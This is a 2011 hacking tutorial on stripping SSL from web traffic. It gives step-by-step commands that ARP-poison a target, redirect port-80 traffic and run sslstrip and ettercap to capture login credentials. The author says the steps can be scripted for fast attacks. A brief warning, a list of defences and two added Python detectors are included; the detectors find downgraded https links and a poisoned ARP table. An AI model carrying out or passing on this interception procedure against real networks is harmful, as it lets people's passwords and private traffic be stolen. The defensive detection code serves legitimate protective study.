How to Defeat SSL in Practice with SSL Strip

Oct 6, 2011 09:58 PM

SSL stands for Secure Sockets Layer. It's an encryption standard used on most sites' login pages to keep their users' passwords from being packet sniffed in plain text. This keeps the users safe by having all of that traffic encrypted over an "https" connection. So, whenever you see "https://" in front of the URL in your browser, you know you're safe... or are you?

In this Null Byte, I'm going to show you how to perform a MITM (Man-In-The-Middle) attack on someone via ARP poisoning. ARP poisoning is a technique used to trick a client into thinking that your computer is the router, and to forward all their traffic to you. This allows you to sniff out all the traffic before sending it to the actual router.

After that, we are going to strip the SSL layer as well, so you can intercept any login, even logins "protected" by SSL. There is a new tool out called BEAST, which decrypts SSL/TLS via an encryption flaw. However, we will be using Moxie Marlinspike's SSL Strip which removes the SSL layer, but makes the connection appear to be normal.

How SSL Strip Works

An attacker picks a target to attack. Afterwards, they spoof themselves to appear as the wireless access point by making their Media Access Control (MAC) address identical to the router's. While they appear to be the router, they send packets to the client/target requesting their packets, thus creating a MITM topology.

The client then forwards requests to the attacker, and the attacker takes the requests and retrieves them from the server for the client. After they receive it, the SSL layer gets stripped and the page is sent to the target. The victim then forwards their packets to the attacker unknowingly, while their private information is picked out of it. SSL Strip puts the SSL layer back on, fills it out, and sends it to the server. Everything looks fine to the server and client, except the attacker gets the information they desire.
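From the defender's side, the stripping step described above can be spotted by comparing a page fetched over a trusted connection with the copy received on the network under test. This is an added example, not code from SSL Strip or the original article; it assumes stripping shows up as https:// URLs rewritten to http://, and the function names, host names and sample pages are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_ATTRS = {"href", "action", "src"}

class LinkCollector(HTMLParser):
    """Collect absolute http(s) URLs found in href/action/src attributes."""
    def __init__(self):
        super().__init__()
        self.urls = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                parts = urlsplit(value.strip())
                if parts.scheme in ("http", "https") and parts.netloc:
                    self.urls.add(parts)

def collect(html):
    parser = LinkCollector()
    parser.feed(html)
    return parser.urls

def key(url):
    # Identity of a link with the scheme ignored.
    return (url.netloc.lower(), url.path, url.query)

def downgraded_links(reference_html, observed_html):
    """URLs that are https in the reference copy but only http in the observed copy."""
    observed = collect(observed_html)
    seen_http = {key(u) for u in observed if u.scheme == "http"}
    seen_https = {key(u) for u in observed if u.scheme == "https"}
    return sorted(u.geturl() for u in collect(reference_html)
                  if u.scheme == "https"
                  and key(u) in seen_http and key(u) not in seen_https)

# Constructed sample pages (hypothetical host names, not from the article).
REFERENCE = """
<a href="https://login.example.test/signin?next=/home">Sign in</a>
<form action="https://login.example.test/session" method="post"></form>
<img src="http://static.example.test/logo.png">
"""
OBSERVED = REFERENCE.replace("https://", "http://")

if __name__ == "__main__":
    for url in downgraded_links(REFERENCE, OBSERVED):
        print("downgraded:", url)
```

A login link or form action that appears in the result is being served without encryption on the observed network even though the site publishes it as HTTPS.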

This is going to be done using Linux, because Windows does not have wireless drivers capable of going into monitor mode. I suggest trying this on yourself on a home network, with two laptops and your friends.

Warnings

  • Don't perform this on people in public. This is a proof of concept to show you why SSL is still vulnerable, and how you can protect yourself using a guide I published previously. Do this on your home network, or you will get caught.

Tools Needed for SSL Strip

The following tools can be found in any package repository:

  • dsniff
  • sslstrip
  • iptables
  • python
  • python-twisted
  • ettercap
  • wireshark

In Arch Linux, I run this command in a terminal to download and install them (Ubuntu users, replace "pacman -S" with "apt-get install"):

sudo pacman -S dsniff iptables python2 python-twisted ettercap wireshark

Now, download SSL Strip from Moxie, while following the install instructions on his page.

Sniffing Traffic (Non-HTTPS)

Get your wireless card into monitor mode, so you're capable of sniffing traffic.

sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode monitor && sudo ifconfig wlan0 up

Now, run wireshark in a terminal to capture airborne packets.

sudo wireshark

Look through the packet details for usernames and passwords in the hexadecimal dump.

Sniffing Traffic (Using HTTPS)

When these commands are entered in the terminal, you need to leave them running, so open a new tab or terminal for each running command.

First we need to scan the local network for our target IP. This means we are pinging everyone on the local network and when we get replies, we can see their IP and pick them as a target.

sudo nmap -sP 192.168.1.0/24

Make sure to paste your test computer's IP somewhere, maybe in a text document so that you can paste in the commands later.

Next, we need to enable IP forwarding. This allows you to forward traffic to/from a client, port and interface that you specify.

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Now we need to set up our interception. This tells iptables that you want to pre-route your incoming port 80 traffic (HTTP) to port 1024, because this is where you will be sniffing your traffic from.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024

It's time to ARP poison your second computer to make it send traffic to you.

sudo arpspoof -i [interface] -t [router ip, target ip]

Next we strip the SSL layer off our target, taking the encrypted layer off to be forwarded to our victim (it even puts the favicon back on so it looks like it's still HTTPS!). Change directories to wherever you saved SSL Strip before typing this.

python sslstrip.py -l 1024

Finally, set up ettercap to capture traffic between you and the client.

sudo ettercap -Tq -i [interface]

Now, go log in to an SSL page, or tell your friend to log in to one, and you will get their traffic. It's simple, and most of this could be tossed into a script for fast attacking.

How Can I Defend Myself?

  • Don't use Wi-Fi you don't trust
  • Tunnel your traffic back home, if you must use public Wi-Fi. You can find good guides, written by me, for Windows and Linux.
  • Don't access sensitive sites on-the-go!
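
To check a machine on your test network for the ARP poisoning step used in this article, compare the gateway's entry in the Linux ARP table against a MAC address recorded while the network was known to be clean. This is an added example, not part of the original article; the function names, the gateway address 192.168.1.1 and the MAC addresses are constructed assumptions.

```python
ATF_COM = 0x2  # flag bit the kernel sets on a completed ARP entry

def parse_arp_table(text):
    """Parse /proc/net/arp content into (ip, mac, device) tuples."""
    entries = []
    for line in text.strip().splitlines()[1:]:  # skip the column header
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, device = fields
        if int(flags, 16) & ATF_COM:            # ignore incomplete entries
            entries.append((ip, mac.lower(), device))
    return entries

def check_gateway(text, gateway_ip, baseline_mac):
    """Return findings as (kind, ip, mac) tuples; an empty list means no anomaly."""
    entries = parse_arp_table(text)
    current = dict((ip, mac) for ip, mac, _ in entries).get(gateway_ip)
    if current is None:
        return [("gateway_unresolved", gateway_ip, None)]
    findings = []
    if current != baseline_mac.lower():
        findings.append(("gateway_mac_changed", gateway_ip, current))
    # A host that poisons the table usually also appears under its own IP,
    # so a second IP sharing the gateway's MAC points at the machine responsible.
    for ip, mac, _ in entries:
        if mac == current and ip != gateway_ip:
            findings.append(("shares_gateway_mac", ip, mac))
    return findings

# Constructed samples in /proc/net/arp format (all addresses are made up).
HEADER = "IP address       HW type     Flags       HW address            Mask     Device\n"
CLEAN = HEADER + (
    "192.168.1.1      0x1         0x2         02:00:00:00:00:01     *        wlan0\n"
    "192.168.1.23     0x1         0x2         02:00:00:00:00:66     *        wlan0\n"
    "192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        wlan0\n")
POISONED = CLEAN.replace("02:00:00:00:00:01", "02:00:00:00:00:66")
BASELINE_MAC = "02:00:00:00:00:01"

if __name__ == "__main__":
    for finding in check_gateway(POISONED, "192.168.1.1", BASELINE_MAC):
        print(finding)
```

On a live Linux machine, pass the contents of /proc/net/arp as the first argument instead of the constructed samples.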

Jump in the IRC channel by following this tutorial to ask me and other members questions, one-on-one!

Image by clshack
